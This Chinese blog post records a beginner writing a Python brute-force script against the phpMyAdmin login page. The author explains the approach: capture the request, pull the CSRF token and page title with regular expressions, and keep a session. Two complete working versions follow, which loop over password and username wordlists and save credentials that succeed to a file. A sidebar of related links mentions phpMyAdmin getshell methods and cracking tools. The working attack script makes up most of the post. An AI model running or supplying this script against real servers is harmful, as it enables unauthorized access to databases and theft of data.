phpmyadmin爆破脚本练习

最新推荐文章于 2023-05-23 17:30:18 发布
最新推荐文章于 2023-05-23 17:30:18 发布
阅读量1.6k 收藏 7
点赞数 3
分类专栏: 工具 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014794539/article/details/119410982
版权

初学python不久 记录一下写脚本的过程

思路 过程

首先 是要对于phpadmin的账号密码进行爆破

先找个环境抓个包看看

请添加图片描述

了解到需要脚本中 准备 请求头 还需要获取到token 最好还能获取到标题 以作验证

提交的数据中 需要pma_username pma_password server=1 target=index.php token等数据

还要进行会话保持

http协议本身是无状态的,为了让请求之间保持状态,有了session和cookie机制。requests也提供了相应的方法去操纵它们。

requests中的session对象能够让我们跨http请求保持某些参数,就是比如使用session成功的登录了某个网站,则在再次使用该session对象求求该网站的其他网页都会默认使用该session之前使用的cookie等参数,尤其是在保持登陆状态时运用的最多,在某些网站抓取,或者app抓取时,有的是强制登陆,有的是不登陆返回的数据就是假的或者说是不完整的数据,那我们不可能去做到每一次请求都要去登陆一下怎么办,就需要用到保持会话的功能了,我们可以只登陆一次,然后保持这种状态去做其他的或者更多的请求。

同时 由于 phpmyadmin中存在token 还需要获取token 还需要获取标题

在获取过程中 需要使用到 re.findall函数来对需要的数据进行正则匹配

. # 点可代表一切字符

\ # 起转义作用

[...] # 指代方括号中的任意字符

\d # 指代数字0-9

\D # 指代非数字

\s # 指代一切空格,包括tab制表符、空格、换行等

\S # 指代非空格

\w # 指代大小写字母、数字和下划线

\W # 指代非大小写字母、数字和下划线

* # 匹配前面字符 >=0 次

+ # 匹配前面字符1次及以上

? # 匹配前面字符0次或1次

{m} # 匹配m次

{m,n} # 匹配m到n次

{m,} # 至少匹配m次

经过调试和验证 得到获取token的语句

name=\"token\" value=\"(.*?)\" />

获取标题的语句
登录前
请添加图片描述

登录后

请添加图片描述

可以通过这个来判断是否登陆成功

通过前后获取到的标题长度不同 或者相同 应该可以判断 是能登陆还是不能

<title>(.*)</title>

获取了标题和token 然后再爆破

同时 在获取token时还遇到了编码解码问题 一些字符会被转义 百度以后查找类似问题后 发现引入unescape函数可以解决问题

return unescape(token[0]) if token else None

爆破成功还可以输出爆破成功的密码账号到txt中

print字符串前面加f表示格式化字符串,加f后可以在字符串里面使用用花括号括起来的变量和表达式,如果字符串里面没有表达式,那么前面加不加f输出应该都一样.

最后得到的脚本如下

脚本

from requests import session
from re import findall
from html import unescape

# phpmyadmin地址,例如 http://localhost/index.php
target = 'http://localhost/index.php'
# 要爆破的用户名
user = 'root'
# 密码字典文件路径
passdic = 'password.txt'
#
ss = session()
ss.headers = {'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate',
              'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \
              Chrome/87.0.4280.88 Safari/537.36'}


def get_token(text) -> str:
    # 获取token
    token = findall("name=\"token\" value=\"(.*?)\" />", text)
    return unescape(token[0]) if token else None


def get_title(text) -> str:
    # 获取标题
    title = findall('<title>(.*)</title>', text)
    return title[0] if title else None


def try_login(user, pwd, token):
    # 尝试登陆
    data = {'pma_username': user,
            'pma_password': pwd,
            'server': 1,
            'target': 'index.php',
            'token': token}
    r = ss.post(url=target, data=data)
    return r.text


def burst_pma():
    # 爆破
    with open(passdic, 'r', encoding='utf-8') as f:
        html = try_login('', '', '')
        title_fail = get_title(html)
        token = get_token(html)
        for line in f:
            pwd = line.strip()
            print(f'[?] loading...  {user}  {pwd}  ')
            html = try_login(user, pwd, token)
            title = get_title(html)
            token = get_token(html)
            if title != title_fail:
                print(f'[√] success  {title}')
                with open('success.txt', 'a', encoding='utf-8') as f:
                    f.write(f'{target}  |  {user}  |  {pwd}\n')
                break
            else:
                print(f'[×] failed  {title}')

    try:
        if __name__ == "__main__":
            burst_pma()
    except Exception as e:
        print(e)

同时生成的密码文件

请添加图片描述

2021-8-5 增加了爆破的灵活性 增加了用户名文件

#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
#使用时需要修改 target中的url 脚本同目录下的字典文件 namedic.txt passdic.txt

from requests import session
from re import findall
from html import unescape

# phpmyadmin地址,例如 http://localhost/index.php
target = 'http://1.1.1.1:1/index.php'

# 用户名字典文件
#user = 'root'
namedic = 'namedic.txt'
# 字典文件路径
passdic = 'password.txt'

ss = session()
ss.headers = {'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate',
              'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \
              Chrome/87.0.4280.88 Safari/537.36'}

	# 获取token函数
def get_token(text) -> str:
    token = findall("name=\"token\" value=\"(.*?)\" />", text)
    return unescape(token[0]) if token else None

	# 获取网站标题函数
def get_title(text) -> str:
    title = findall('<title>(.*)</title>', text)
    return title[0] if title else None

	#尝试登录函数
def try_login(user, pwd, token):
    data = {'pma_username': user,
            'pma_password': pwd,
            'server': 1,
            'target': 'index.php',
            'token': token}
    r = ss.post(url=target, data=data)
    return r.text

	#爆破函数
def burst_pma():
    html = try_login('', '', '')
    title_fail = get_title(html)
    token = get_token(html)
    with open(passdic, 'r', encoding='utf-8') as f:
        for line in f:
            with open(namedic, 'r', encoding='utf-8') as h:
                for li in h:
                    user = li.strip()
                    pwd = line.strip()
                    print(f'[?] loading  {user}  {pwd}  ')
                    html = try_login(user, pwd, token)
                    title = get_title(html)
                    token = get_token(html)
                    if title != title_fail:
                        print(f'[+] success  {title}')
                        with open('success.txt', 'a', encoding='utf-8') as g:
                            g.write(f'{target}  |  {user}  |  {pwd}\n')
                        break
                    else:
                        print(f'[-] failed  {title}')


if __name__ == "__main__":
    try:
        burst_pma()
    except Exception as e:
        print(e)

在这里插入图片描述

反思

1.由于对python的内容了解不多 很多功能一开始并不知道怎么实现 ,百度才发现有现成的函数 和功能 对于登录成功的判断有点投机取巧 应该是有更加明确的方式进行判断的

2.对于脚本工具的使用更加了解,增加了对python的认知

3.写完考虑到可能不只是单一用户名 后续可以 加上对用户名的遍历打开俩文件遍历 还差点翻车 …

4.还是多练习 这次啥也不懂查了好多资料 看了好多类似的爆破 脚本 对于正则表达式用的不够熟练 提取数据试验了很多次 很多地方写的还很笨 以后学的多了慢慢修改,,,,

参考文章

https://www.sqlsec.com/2018/07/pyscript1.html

https://blog.csdn.net/wsnbbz/article/details/105531530

https://blog.csdn.net/blbq105/article/details/85274676

https://www.cnblogs.com/zhuosanxun/p/12679121.html

https://zhuanlan.zhihu.com/p/139596371

https://www.cnblogs.com/wangbinbin/p/7101099.html

https://www.cnblogs.com/dearddu/p/12464891.html

Pale1c
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpmyadmin爆破和后台getshell
谢公子的博客
12-09 5827
目录 phpmyadmin phpmyadmin后台的爆破 phpmyadmin后台GetShell into outfile写木马 利用日志文件Getshell phpmyadmin phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂...
phpmyadmin getshell总结
good good study
10-25 3037
phpMyAdmin 是一个用PHP编写的开源软件工具,可以通过web方式控制和操作MySQL数据库。通过phpMyAdmin 可以完全对数据库进行操作,例如建立、复制和删除数据等。
爆破phpmyadmin
m0_51589948的博客
08-08 1153
爆破phpmyadmin 因为是第一次写脚本,所以没有爆破phpmyadmin的思路 后来百度到很多爆破phpmyadmin脚本,找到了一些思路 大概就是用python构造对phpmyadmin的登录请求,根据登录前后的源码中的一些不同的信息判断是否登录成功,我们又从发送的请求包中获取了请求参数,以及文件头信息·pma_username=roofffffft&pma_password=fffroot&server=1&token=3b88f0df1d082083aae8b4ccc
phpmyadmin Getshell 思路
这里是Y.lin的博客,目前是一名网络安全专业的学生,希望和师傅们一起进步吧!
05-23 237
phpmyadmin Getshell 思路
phpmyadmin忘记密码解决办法
Nuyoah的博客
04-21 5543
phpmyadmin忘记密码怎么办 1,找到wampserver的安装目录,打开mysql下bin目录中的my.ini 比如我的位置在:C:\wamp64\bin\mysql\mysql5.7.26 2,打开my.ini,找到如下位置,加入命令 skip_grant_tables ,保存并重启wampserver 3,打开cmd 进入到C:\wamp64\bin\mysql\mysql5.7.26\bin目录 输入mysql -uroot -p回车 4,不用输入密码,再回车,如图: 5,重新设置密码
phpMyAdmin(MySQL)暴力破解工具v1.3.rar
06-18
目前phpMyAdmin3.2.5,phpMyAdmin3.2.1、phpMyAdmin2.11.2版本测试均成功! 此工具仅供网友技术学习交流使用,请勿使用于非法用途。
phpMyAdmin爆破源码
05-21
phpMyAdmin爆破源码,找到phpMyAdmin登陆页面,可以使用该工具进行爆破
phpmyadmin爆破工具
03-28
phpMyAdmin(MySQL)暴力破解工具v1.3,纯净版。
phpmyadmin爆破程序
05-22
phpmyadmin爆破程序 自己选择自己的字典文件
phpmyadmin批量爆破
01-23
批量查找路径
phpMyAdmin多线程批量破解工具
10-16
phpMyAdmin多线程批量破解工具是一款用于数据库密码强制破解的工具,了解它的朋友想必不用做过多的介绍就应该了解他他是做什么的。 之前朋友问我有木有phpMyAdmin批量破解工具, 我在网上搜索了一下并没有发现相关的工具,然后自己动手写了一款,多线程批量破解phpMyAdmin的工具,支持破解phpMyAdmin 2.11.10到4.4.11版本,如果需要支持变量用户名及密码(如%user%%domain%) 请私人定制。你还在为MySQL的外连功能关闭而烦恼吗,利用phpMyAdmin破解数据库账户密码的工具来了。
PHP字典全自动猜解MYSQL弱口令
09-10
PHP字典跑服务器MYSQL数据库密码,自己准备好字典(password.txt)和shell放在同一目录,访问shell.php即可。
phpMyAdmin暴力破解v1.3
07-21
我正在网上搜刮了一下没发明相干的东西, 因而本身出手翰单真现这听命, 而今phpMyAdmin3.2.5,phpMyAdmin3.2.1、phpMyAdmin2.11.2版本测试均成功! 此东西仅供网友技术进修交换利用,请勿利用于犯警用处。 MySQL数据库字典,人人就本身网上支散了! 当前版本 v1.2 MD5:541465699949f3d60fcea923ccf245b2 sha1:e23d7ce46606d530abc4a9e473bdb0b5247aaff1 – ver1.2 措置对phpMyAdmin3.2.5版本暴破有标题问题,删加了一个工作线程, 美化了界面。 – ver1.1 1.0版本有个标题问题,正在win7、vista下都不能正常扫描, 现曾纠正过往。 ————————————————— 技术总结: 《vc6建正删除cookie真现》 InternetSetCookie函数太老,能建正一般cookie值,但是正在win7下高版本Wininet.DLL中无法让HTTPONLY类型的cookie过时, 要利用InternetSetCookieEx函数才成功,正在vs2010下直接用该函数,vc6下本身加载模块查找函数, vc6下查找利用该函数删除cookie以下: HINSTANCE hInst = LoadLibrary(“Wininet.DLL”); if(hInst) { typedef BOOL (WINAPI *pfnInternetSetCookieEx)(LPCSTR, LPCSTR, LPCSTR, DWORD, DWORD); pfnInternetSetCookieEx InternetSetCookieEx = NULL; InternetSetCookieEx = (pfnInternetSetCookieEx)GetProcAddress(hInst, “InternetSetCookieExA”); //InternetSetCookieEx(m_url, NULL, ” phpMyAdmin=; expires=Thu, 01-Jan-1900 00:00:01 GMT”, INTERNET_COOKIE_HTTPONLY, NULL); InternetSetCookieEx(m_url, NULL, ” phpMyAdmin=; expires=Thu, 01-Jan-1900 00:00:01 GMT”, INTERNET_COOKIE_HTTPONLY, NULL); FreeLibrary(hInst); } 寄看,要分隔设置cookie字段,不能一次设置多个字段,不然不成功,下面的语句只要第一个字段被设置成功,其它字段均不成功! InternetSetCookieEx(m_url, NULL, ” phpMyAdmin=; pma_mcrypt_iv=; pmaUser-1=; pmaPass-1=; expires=Thu, 01-Jan-1900 00:00:01 GMT”, INTERNET_COOKIE_HTTPONLY, NULL); 精确理当如许写, InternetSetCookieEx(m_url, NULL, ” phpMyAdmin=; expires=Thu, 01-Jan-1900 00:00:01 GMT”, INTERNET_COOKIE_HTTPONLY, NULL); InternetSetCookieEx(m_url, NULL, ” pma_mcrypt_iv=; expires=Thu, 01-Jan-1900 00:00:01 GMT”, INTERNET_COOKIE_HTTPONLY, NULL); InternetSetCookieEx(m_url, NULL, ” pmaUser-1=; expires=Thu, 01-Jan-1900 00:00:01 GMT”, INTERNET_COOKIE_HTTPONLY, NULL); InternetSetCookieEx(m_url, NULL, ” pmaPass-1=; expires=Thu, 01-Jan-1900 00:00:01 GMT”, INTERNET_COOKIE_HTTPONLY, NULL); 1>
phpmyadmin及php爆路径字典
11-04
phpmyadmin后台,后台管理路径爆破,以及,php常用路径爆破字典
phpmyadmin漏洞分析复现
weixin_43047908的博客
08-19 1240
目录前言环境搭建漏洞复现CVE-2016-5734CVE-2018-12613 前言 phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL
secquan phpmyadmin批量爆破工具_kali linux 工具使用之 001 dnsenum
weixin_39710179的博客
11-22 775
相信看过我kali Linux 工具使用之 001 dnsenum这篇文章的朋友已经对 dns 信息在渗透测试中的作用已经清楚了,dns 信息能够暴露一个目标系统的许多信息,往往一个渗透测试项目就是从一个域名开始的,第一步就是获取 dns 信息,然后从 dns 信息中找突破口,发现新的渗透测试路径。相比于 dnsenum,dnsmap 只有字典爆破一个手段来收集目标的 dns 信息,不像 dnse...
Metasploit密码爆破模块
m0_55313512的博客
03-07 4267
Metasploit密码爆破模块
phpMyadmin提权那些事
dfdhxb995397的博客
06-01 346
i春秋作家:anyedt phpMyadmin提权那些事 引言:在渗透测试过程中获知到phpMyadmin的账号密码,如何进行提权呢?往下看,我今天和你说说phpMyadmin提权那些事。 0×00 定义 ​ phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。 ...
最全phpmyadmin漏洞汇总
热门推荐
kracer的博客
12-04 2万+
目录 一、phpMyAdmin简介 二、查看phpmyadmin版本 三、历史漏洞及poc利用 1、万能密码直接登入 2、CVE-2009-1151:远程代码执行 3、CVE-2012-5159:任意PHP代码攻击 4、CVE-2013-3238:远程PHP代码执行 5、WooYun-2016-199433:任意文件读取漏洞 6、CVE-2014 -8959:本地文件包含 7、CVE-2016-5734 :后台命令执行RCE 8、CVE-2017-1000499 跨站请求伪造 9、C
shell脚本安装phpmyadmin
最新发布
06-02
安装phpMyAdmin的方法因操作系统而异,以下是在Linux上安装phpMyAdmin的一般步骤: 1.打开终端并以root身份登录 2.使用包管理器安装PHP(如果尚未安装): - Debian/Ubuntu:apt-get install php - CentOS/Fedora:yum install php 3.安装apache web服务器(如果尚未安装): - Debian/Ubuntu:apt-get install apache2 - CentOS/Fedora:yum install httpd 4.安装phpMyAdmin: - Debian/Ubuntu:apt-get install phpmyadmin - CentOS/Fedora:yum install phpMyAdmin 5.在安装期间,你可能会被要求输入mysql数据库管理员的用户名和密码。如果你还没有设置它们,请先在mysql中设置一个管理员用户名和密码。 6.启动Web服务器: - Debian/Ubuntu:service apache2 start - CentOS/Fedora:service httpd start

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值